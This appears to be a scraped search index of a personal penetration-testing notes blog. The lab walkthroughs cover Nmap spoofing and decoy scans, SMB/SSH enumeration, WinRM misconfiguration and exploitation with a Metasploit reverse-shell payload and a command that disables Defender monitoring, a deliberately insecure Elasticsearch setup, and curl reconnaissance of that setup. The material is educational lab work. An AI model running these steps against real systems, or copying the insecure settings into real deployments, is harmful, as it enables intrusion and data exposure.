that are directly connected to the internet. Ethical hackers, penetration testers, and even threat actors use Shodan to identify their organization\u0026rsquo;s or target\u0026rsquo;s assets, and they check whether they have been publicly exposed on the internet.\u003c/p\u003e","title":"Social Media Recon (SOCMINT)"},{"content":" NMAP supports both MAC, IP address spoofing, follow the command. nmap -Pn --spoof-mac Dell target_ip I captured the live packet using wireshark it actually spoofed the MAC address to DELL\u0026rsquo;S MAC address: you can set the option --spoof-mac 0 to let NMAP choose which vendor it wants to choose. To spoof an IP address during a scan while using Nmap, use the –S command: sudo nmap -S spoofed_ip -e eth0 target_ip # sudo nmap -S 192.168.0.1 -e eth0 172.30.1.134 IP spoofing won\u0026rsquo;t work well, as when the target will try to do Three-way-handshake the TCP SYN-ACK reply will go to the spoofed IP, we will never receive a connection/scan results back.\nUse DECOY only for IPs, nmap -D DECOY_IP_1,DECOY_IP_2,ME,DECOY_IP_3 target_ip ME : nmap will insert our actual IP in this place among the deocys, cool isn\u0026rsquo;t it. Having completed this section, you have learned how to evade detection on a network while performing scanning using Nmap.\nperforming a stealth scan: By default, Nmap establishes a TCP 3-way handshake on any open TCP ports found on the target systems. Once the handshake has been established between the attacker system and the target, data packets are exchanged between each host. To prevent Three way handshake , we can use nmap's stealth scan. A stealth scan does not establish a full TCP handshake with the target. The attacker machine tricks the target by sending a TCP SYN packet to a specific port on the target system to determine if the port is open. Then, the target system will respond with a TCP SYN/ACK packet if the port is open. Lastly, the attacker will send a TCP RST packet to the target to reset the connection state and terminate the connection. NMAP stealth scanning using filter -sS nmap -sS -p80 172.30.1.134 wireshark view of SYN -\u0026gt; SYN-ACK -\u0026gt; RST flow ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/06-spoofind-mac-and-ip-address/","summary":"\u003col\u003e\n\u003cli\u003eNMAP supports both \u003ccode\u003eMAC, IP\u003c/code\u003e address spoofing, follow the command.\n\u003cimg alt=\"ip_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/06/ip_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn --spoof-mac Dell target_ip\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"ip_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/06/ip_2.png\"\u003e\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eI captured the live packet using \u003ccode\u003ewireshark\u003c/code\u003e it actually spoofed the \u003ccode\u003eMAC address\u003c/code\u003e to DELL\u0026rsquo;S MAC address:\n\u003cimg alt=\"ip_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/06/ip_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eyou can set the option \u003ccode\u003e--spoof-mac 0\u003c/code\u003e to let NMAP choose which vendor it wants to choose.\u003c/li\u003e\n\u003cli\u003eTo spoof an IP address during a scan while using Nmap, use the \u003ccode\u003e–S\u003c/code\u003e command:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo nmap -S spoofed_ip -e eth0 target_ip\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# sudo nmap -S 192.168.0.1 -e eth0 172.30.1.134\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cem\u003eIP spoofing won\u0026rsquo;t work well, as when the target will try to do Three-way-handshake the TCP SYN-ACK reply will go to the spoofed IP, we will never receive a connection/scan results back.\u003c/em\u003e\u003c/p\u003e","title":"Spoofing MAC \u0026 IP Address"},{"content":"It is not recommended to add local accounts into Domain Controllers, they should be on workstations only. Use your windows machines, not the server. Steps should be similar as this practical.\nBy default on windows server 2019 winRM comes enabled. We can verify through server manager as well as CLI , let\u0026rsquo;s verify: SERVER MANAGER: POWERSHELL: Default port for WINRM is 5985 # command netstat -ano | findstr \u0026#34;5985\u0026#34; The WinRM service starts automatically on Windows Server 2008, and later. On earlier versions of Windows (client or server), you need to start the service manually. winrm hardening: RESOURCE-BLOG\nBy default, no WinRM listener is configured. Even if the WinRM service is running, WS-Management protocol messages that request data can\u0026rsquo;t be received or sent. Internet Connection Firewall (ICF) blocks access to ports. COMMANDS:\nwinrm enumerate winrm/config/listener winrm get winrm/config winrm quickconfig # winrm qc (in short) winrm misconfigs for exploitation: COMMANDS:\nAllowing unencrypted http traffic: winrm set winrm/config/service \u0026#39;@{AllowUnencrypted=\u0026#34;true\u0026#34;}\u0026#39; 2. Enabling basic authentication on the server:\nwinrm set winrm/config/service/auth \u0026#39;@{Basic=\u0026#34;true\u0026#34;}\u0026#39; 3. Adding a local user sysadmin into the group of winrm 4. But first we need to create that group if it\u0026rsquo;s not been created automatically:\nnet localgroup \u0026#34;WinRMRemoteWMIUsers__\u0026#34; /add /comment:\u0026#34;Users authorized for remote WMI and WinRM.\u0026#34; then add the user\nnet localgroup \u0026#34;WinRMRemoteWMIUsers__\u0026#34; \u0026#34;TheUserName\u0026#34; /add 5. Now we need to configure that the group is having proper permissions and ACLs for remote connections, follow the steps:\nwinrm configSDDL default 6. To confirm the group is added type this command in cmd:\n(Get-PSSessionConfiguration -Name \u0026#34;Microsoft.PowerShell\u0026#34;).Permission IF THE GROUP ALREADY EXISTS, LIKE IN MY CASE IT IS, then follow the steps: net localgroup \u0026#34;Remote Management Users\u0026#34; \u0026#34;sysadmin\u0026#34; /add ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/06-winrm-configuration-on-win-server-2019/","summary":"\u003cp\u003e\u003cstrong\u003eIt is not recommended to add local accounts into Domain Controllers, they should be on workstations only. Use your windows machines, not the server. Steps should be similar as this practical.\u003c/strong\u003e\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eBy default on \u003ccode\u003ewindows server 2019\u003c/code\u003e \u003ccode\u003ewinRM\u003c/code\u003e comes enabled.\u003c/li\u003e\n\u003cli\u003eWe can verify through \u003ccode\u003eserver manager\u003c/code\u003e as well as \u003ccode\u003eCLI\u003c/code\u003e , let\u0026rsquo;s verify:\n\u003ccode\u003eSERVER MANAGER:\u003c/code\u003e\n\u003cimg alt=\"wr_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/06/wr_1.png\"\u003e\n\u003ccode\u003ePOWERSHELL:\u003c/code\u003e\n\u003cimg alt=\"wr_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/06/wr_2.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003eDefault port for \u003ccode\u003eWINRM\u003c/code\u003e is \u003ccode\u003e5985\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c\"\u003e# command\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003enetstat\u003c/span\u003e \u003cspan class=\"n\"\u003e-ano\u003c/span\u003e \u003cspan class=\"p\"\u003e|\u003c/span\u003e \u003cspan class=\"n\"\u003efindstr\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;5985\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cul\u003e\n\u003cli\u003eThe WinRM service starts automatically on Windows Server 2008, and later. On earlier versions of Windows (client or server), you need to start the service manually.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"winrm-hardening\"\u003ewinrm hardening:\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://learn.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management\"\u003eRESOURCE-BLOG\u003c/a\u003e\u003c/p\u003e","title":"WinRM Configuration on Windows Server 2019"},{"content":"Scanning using metasploit: start the msfconsole sudo msfconsole search for portscan modules: msf\u0026gt; search portscan 3. Let\u0026rsquo;s use the 6th module and do the operation:\nuse 6 options set RHOSTS 172.30.1.134 # setting the targt_ip run Enumerating SMB using msfconsole: Server Message Block (SMB) is a network service that allows hosts to send resources such as files to other hosts on a network. As an aspiring ethical hacker and penetration tester, it\u0026rsquo;s always recommended to enumerate file shares once it\u0026rsquo;s within your scope for the penetration test.\nResults: Using more than one tool to enumerate services running on your target is always good because there\u0026rsquo;s the possibility one tool may miss something important, while the other tool may not.\nSince SMB has been discovered on our target system, we can use smbmap to enumerate the files and shared drives within the target. To get started with smbmap , open a new terminal and type the following command: smbmap -H 172.30.1.134 2. We can see that anyone can access the tmp share plus having read and write perms. 3. Let\u0026rsquo;s display the contents of that file share:\nsmbmap -H 172.30.1.134 -r tmp 4. To download the contents of a shared drive using SMBMap, use the following command:\nsmbmap -H 172.30.1.134 --download .\\tmp\\* --download : This option will ask for the path of downloading the contents. .\\tmp\\* : This is the file share we are going to download, \\* means everything inside the file share.\nEnumerating SSH using msfconsole: Secure Shell (SSH) is a common network protocol that\u0026rsquo;s found on many organizations\u0026rsquo; networks. It allows IT professionals to establish a secure, encrypted Terminal connection between their device and a remote server. Port 22 is the default port for ssh .\nWe will start off with enumerating the version of ssh that\u0026rsquo;s been used bye the vulnerable machine. search ssh_version use auxiliary/scanner/ssh/ssh_version options set RHOSTS target_ip run FINDINGS FROM SSH ENUM: SSH version -\u0026gt; OpenSSH 4.7p1, OS version -\u0026gt; Debian8 ubuntu 1\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/07-enumerating-common-network-services/","summary":"\u003ch2 id=\"scanning-using-metasploit\"\u003eScanning using metasploit:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003estart the \u003ccode\u003emsfconsole\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo msfconsole\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003esearch for \u003ccode\u003eportscan\u003c/code\u003e modules:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf\u0026gt; search portscan\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"cn_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/07/cn_1.png\"\u003e\n3. Let\u0026rsquo;s use the 6th module and do the operation:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euse \u003cspan class=\"m\"\u003e6\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eoptions\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 172.30.1.134 \u003cspan class=\"c1\"\u003e# setting the targt_ip\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"cn_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/07/cn_2.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"enumerating-smb-using-msfconsole\"\u003eEnumerating SMB using msfconsole:\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eServer Message Block (SMB)\u003c/code\u003e is a network service that allows hosts to send resources such as files to other hosts on a network. As an aspiring ethical hacker and penetration tester, it\u0026rsquo;s always recommended to enumerate file shares once it\u0026rsquo;s within your scope for the penetration test.\u003c/p\u003e","title":"Enumerating Common Network Services"},{"content":" In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems. exploitation: Open kali for scanning and exploitation: Open up msfconsole for exploitation part: sudo msfconsole use auxiliary/scanner/winrm/winrm_cmd msf auxiliary(scanner/winrm/winrm_cmd) \u0026gt; set RHOSTS 192.168.83.140 RHOSTS =\u0026gt; 192.168.83.140 msf auxiliary(scanner/winrm/winrm_cmd) \u0026gt; set USERNAME Administrator USERNAME =\u0026gt; Administrator msf auxiliary(scanner/winrm/winrm_cmd) \u0026gt; set PASSWORD P@ssword1 PASSWORD =\u0026gt; P@ssword1 By default the command that will execute it is ipconfig /all Remember the setup of localuser for winrm access where we gave access to the user sysadmin , let\u0026rsquo;s try that: It actually worked. Now let\u0026rsquo;s try for Remote shell: msf6 \u0026gt; use exploit/windows/winrm/winrm_script_exec msf6 exploit(windows/winrm/winrm_script_exec) \u0026gt; set RHOSTS 192.168.83.140 msf6 exploit(windows/winrm/winrm_script_exec) \u0026gt; set LHOST 192.168.83.128 Also turn off real time protection in your windwos server , because it will quarantine the execution. use this command on powershell into your DC Set-MpPreference -DisableRealtimeMonitoring $true 3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit. 4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let\u0026rsquo;s see the options:\nmsf exploit(windows/winrm/winrm_script_exec) \u0026gt; set DOMAIN REDTEAMLAB DOMAIN =\u0026gt; REDTEAMLAB msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set USERNAME Administrator USERNAME =\u0026gt; Administrator msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set PASSWORD Password123 PASSWORD =\u0026gt; Password123 msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set payload windows/x64/meterpreter/reverse_tcp payload =\u0026gt; windows/x64/meterpreter/reverse_tcp msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set FORCE_VBS false FORCE_VBS =\u0026gt; false run the exploit: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/07-winrm-exploitation/","summary":"\u003cul\u003e\n\u003cli\u003eIn a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"exploitation\"\u003eexploitation:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eOpen kali for scanning and exploitation:\n\u003cimg alt=\"we_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eOpen up \u003ccode\u003emsfconsole\u003c/code\u003e for exploitation part:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo msfconsole\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euse auxiliary/scanner/winrm/winrm_cmd\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf auxiliary\u003cspan class=\"o\"\u003e(\u003c/span\u003escanner/winrm/winrm_cmd\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 192.168.83.140\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nv\"\u003eRHOSTS\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e\u0026gt; 192.168.83.140\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf auxiliary\u003cspan class=\"o\"\u003e(\u003c/span\u003escanner/winrm/winrm_cmd\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e USERNAME Administrator\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nv\"\u003eUSERNAME\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e\u0026gt; Administrator\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf auxiliary\u003cspan class=\"o\"\u003e(\u003c/span\u003escanner/winrm/winrm_cmd\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e PASSWORD P@ssword1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nv\"\u003ePASSWORD\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e\u0026gt; P@ssword1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"3\"\u003e\n\u003cli\u003eBy default the command that will execute it is \u003ccode\u003eipconfig /all\u003c/code\u003e\n\u003cimg alt=\"we_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_2.png\"\u003e\n\u003cimg alt=\"we_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eRemember the setup of localuser for \u003ccode\u003ewinrm\u003c/code\u003e access where we gave access to the user \u003ccode\u003esysadmin\u003c/code\u003e , let\u0026rsquo;s try that:\n\u003cimg alt=\"we_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_4.png\"\u003e\n\u003cimg alt=\"we_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_5.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003eIt actually worked.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003col\u003e\n\u003cli\u003eNow let\u0026rsquo;s try for Remote shell:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 \u0026gt; use exploit/windows/winrm/winrm_script_exec \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003ewindows/winrm/winrm_script_exec\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 192.168.83.140 \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003ewindows/winrm/winrm_script_exec\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e LHOST 192.168.83.128\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003eAlso turn off \u003ccode\u003ereal time protection\u003c/code\u003e in your \u003ccode\u003ewindwos server\u003c/code\u003e , because it will \u003ccode\u003equarantine\u003c/code\u003e the execution.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003euse this command on \u003ccode\u003epowershell\u003c/code\u003e into your \u003ccode\u003eDC\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eSet-MpPreference\u003c/span\u003e \u003cspan class=\"n\"\u003e-DisableRealtimeMonitoring\u003c/span\u003e \u003cspan class=\"vm\"\u003e$true\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"we_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_6.png\"\u003e\n3. After selecting the exploit/windows/winrm/winrm_script_exec module, a \u003ccode\u003ereverse shell\u003c/code\u003e payload was automatically coupled with the exploit module within Metasploit.\n\u003cimg alt=\"we_7\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_7.png\"\u003e\n4. For the \u003ccode\u003eexploit/windows/winrm/winrm_script_exec\u003c/code\u003e module to have a better chance of success, force the exploit module to use the \u003ccode\u003eVBS CmdStager\u003c/code\u003e option in case your target is an old system, if not set it to \u003ccode\u003efalse\u003c/code\u003e only, let\u0026rsquo;s see the options:\u003c/p\u003e","title":"WinRM Exploitation"},{"content":"Requirements: Step 1: Install Java JDK 17 Elasticsearch is a Java application and requires a Java Development Kit (JDK) to run.\nOn your Windows Server 2019 VM, open the Edge browser you installed. Search for \u0026ldquo;OpenJDK 17 download/jdk 17 install\u0026rdquo; (Microsoft, Oracle, Red Hat etc are all good providers). Download the Windows x64 JDK as a .zip file (not the JRE). Once downloaded, extract the .zip file to a simple, permanent location, such as C:\\Program Files\\Java\\jdk-17. Step 2: Set the JAVA_HOME Environment Variable This tells Windows where to find the Java installation.\nIn the Windows Start Menu, type \u0026ldquo;environment\u0026rdquo; and select \u0026ldquo;Edit the system environment variables\u0026rdquo;. The \u0026ldquo;System Properties\u0026rdquo; window will open. Click the \u0026ldquo;Environment Variables\u0026hellip;\u0026rdquo; button at the bottom. In the bottom half, under \u0026ldquo;System variables\u0026rdquo;, click the \u0026ldquo;New\u0026hellip;\u0026rdquo; button. Variable name: JAVA_HOME Variable value: C:\\Program Files\\Java\\jdk-17 (or the path where you extracted the JDK) Click OK. Still in \u0026ldquo;System variables,\u0026rdquo; find the \u0026ldquo;Path\u0026rdquo; variable, select it, and click \u0026ldquo;Edit\u0026hellip;\u0026rdquo;. Click \u0026ldquo;New\u0026rdquo; and add a new entry: %JAVA_HOME%\\bin Click OK on all windows to close them. To verify the install: Open a new Command Prompt and type java -version. It should show \u0026ldquo;OpenJDK version 17\u0026hellip;\u0026rdquo;. if you are having this kind of error on accessing the env variables section: Then follow the second path:\npress win + R write sysdm.cpl and press enter. Then click on to advanced tab, click Environment variables . Now you can rejoin the previous step - 3 Step 3: Download and Unzip Elasticsearch Go to the official \u0026ldquo;Past Releases\u0026rdquo; page for Elasticsearch (search for \u0026ldquo;Elasticsearch past releases\u0026rdquo;). Find a modern version you want to use, for example, version 7.17.10 (a popular, stable release from the 7.x series) or any 8.x version. Click the \u0026ldquo;Download\u0026rdquo; link and get the Windows .zip file. Create a folder for your server, for example: C:\\Elasticsearch. Extract the entire contents of the .zip file into that folder. Your final path will look something like C:\\Elasticsearch\\elasticsearch-7.17.10. Step 4: Deliberately Misconfigure Elasticsearch This is the most important step. You will edit the main configuration file to add the \u0026ldquo;vulnerabilities.\u0026rdquo;\nNavigate into your Elasticsearch folder, then into the config sub-folder. Example: C:\\Elasticsearch\\elasticsearch-7.17.10\\config Open the file named elasticsearch.yml in a text editor like Notepad. This file is mostly comments (lines starting with #). Scroll to the very end of the file and add the following lines on a new line. (This avoids accidentally editing a commented-out line). # --- DANGEROUS SETTINGS FOR PENTEST LAB --- # 1. This disables all security (authentication, passwords, etc.) xpack.security.enabled: false xpack.security.transport.ssl.enabled: false xpack.security.http.ssl.enabled: false # 2. This binds Elasticsearch to ALL network adapters (0.0.0.0) # This is what makes it accessible from your Kali machine network.host: 0.0.0.0 # 3. This helps a single-node cluster start up (often needed for dev) discovery.type: single-node 4. Save the elasticsearch.yml file and close the text editor.\nStep 5: Run the Server Open a Command Prompt. Navigate to your Elasticsearch installation directory: cd C:\\Elasticsearch\\elasticsearch-7.17.10 Run the server using its batch file: bin\\elasticsearch.bat A lot of text will scroll by. Wait until you see messages indicating the server has started and is \u0026ldquo;publishing\u0026rdquo; its address. You may see a warning about security being disabled—this is expected and confirms your misconfiguration is working. Leave this command prompt open! Closing it will shut down the server. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/08-setting-up-modern-vulnerable-elastic-search/","summary":"\u003ch2 id=\"requirements\"\u003eRequirements:\u003c/h2\u003e\n\u003ch3 id=\"step-1-install-java-jdk-17\"\u003eStep 1: Install Java JDK 17\u003c/h3\u003e\n\u003cp\u003eElasticsearch is a Java application and requires a Java Development Kit (JDK) to run.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eOn your Windows Server 2019 VM, open the Edge browser you installed.\u003c/li\u003e\n\u003cli\u003eSearch for \u0026ldquo;OpenJDK 17 download/jdk 17 install\u0026rdquo; (Microsoft, Oracle, Red Hat etc are all good providers).\u003c/li\u003e\n\u003cli\u003eDownload the \u003cstrong\u003eWindows x64 JDK\u003c/strong\u003e as a \u003ccode\u003e.zip\u003c/code\u003e file (not the JRE).\u003c/li\u003e\n\u003cli\u003eOnce downloaded, extract the \u003ccode\u003e.zip\u003c/code\u003e file to a simple, permanent location, such as \u003ccode\u003eC:\\Program Files\\Java\\jdk-17\u003c/code\u003e.\n\u003cimg alt=\"es_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/08/es_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch3 id=\"step-2-set-the-java_home-environment-variable\"\u003eStep 2: Set the \u003ccode\u003eJAVA_HOME\u003c/code\u003e Environment Variable\u003c/h3\u003e\n\u003cp\u003eThis tells Windows where to find the Java installation.\u003c/p\u003e","title":"Setting Up Modern Vulnerable ElasticSearch"},{"content":" As many organizations are using cloud-based email solutions such as Office 365 and Google Workspace for their employees, they are also synchronizing their Active Directory user database with the email services of their preferred cloud-based email provider. This means that an employee\u0026rsquo;s login username is the same as the username portion of their email address. When we get into any login page, there is a high chance that we can guess an username/email and later the page will give us a password incorrect error, through which we can identify that we are having a valid username which is can also be found in the target\u0026rsquo;s AD services. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/08-performing-user-enum-using-noise-authentication/","summary":"\u003col\u003e\n\u003cli\u003eAs many organizations are using cloud-based email solutions such as Office 365 and Google Workspace for their employees, they are also synchronizing their \u003ccode\u003eActive Directory\u003c/code\u003e user database with the email services of their preferred cloud-based email provider. This means that an employee\u0026rsquo;s login username is the same as the username portion of their email address.\u003c/li\u003e\n\u003cli\u003eWhen we get into any login page, there is a high chance that we can guess an username/email and later the page will give us a \u003ccode\u003epassword incorrect\u003c/code\u003e error, through which we can identify that we are having a valid username which is can also be found in the target\u0026rsquo;s AD services.\u003c/li\u003e\n\u003c/ol\u003e","title":"User Enumeration Using Noise Authentication"},{"content":" Through the previous misconfigs, i should have full access to the elastic search database. Let\u0026rsquo;s see and exploit: Reconnaissance of the database: curl -X GET \u0026#34;http://192.168.83.140:9200\u0026#34; curl -X GET \u0026#34;http://192.168.83.140:9200/_cat/indices?v\u0026#34; _cat/indices: This is the API command to list all indices.\n?v: This makes the output \u0026ldquo;verbose\u0026rdquo; (shows headers), so it\u0026rsquo;s easy to read.\nWhy it\u0026rsquo;s dangerous: This tells the attacker the names of all your databases, such as prod-users or customer-logs. EXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND: \u0026quot;name\u0026quot; : \u0026quot;DC1\u0026quot;\nWhat it is: The node name of this specific Elasticsearch server.\nExplanation: An Elasticsearch cluster can be made of many servers (nodes). You can name each one. When you started the server, it either found this name in the elasticsearch.yml file or, more likely, it defaulted to using the 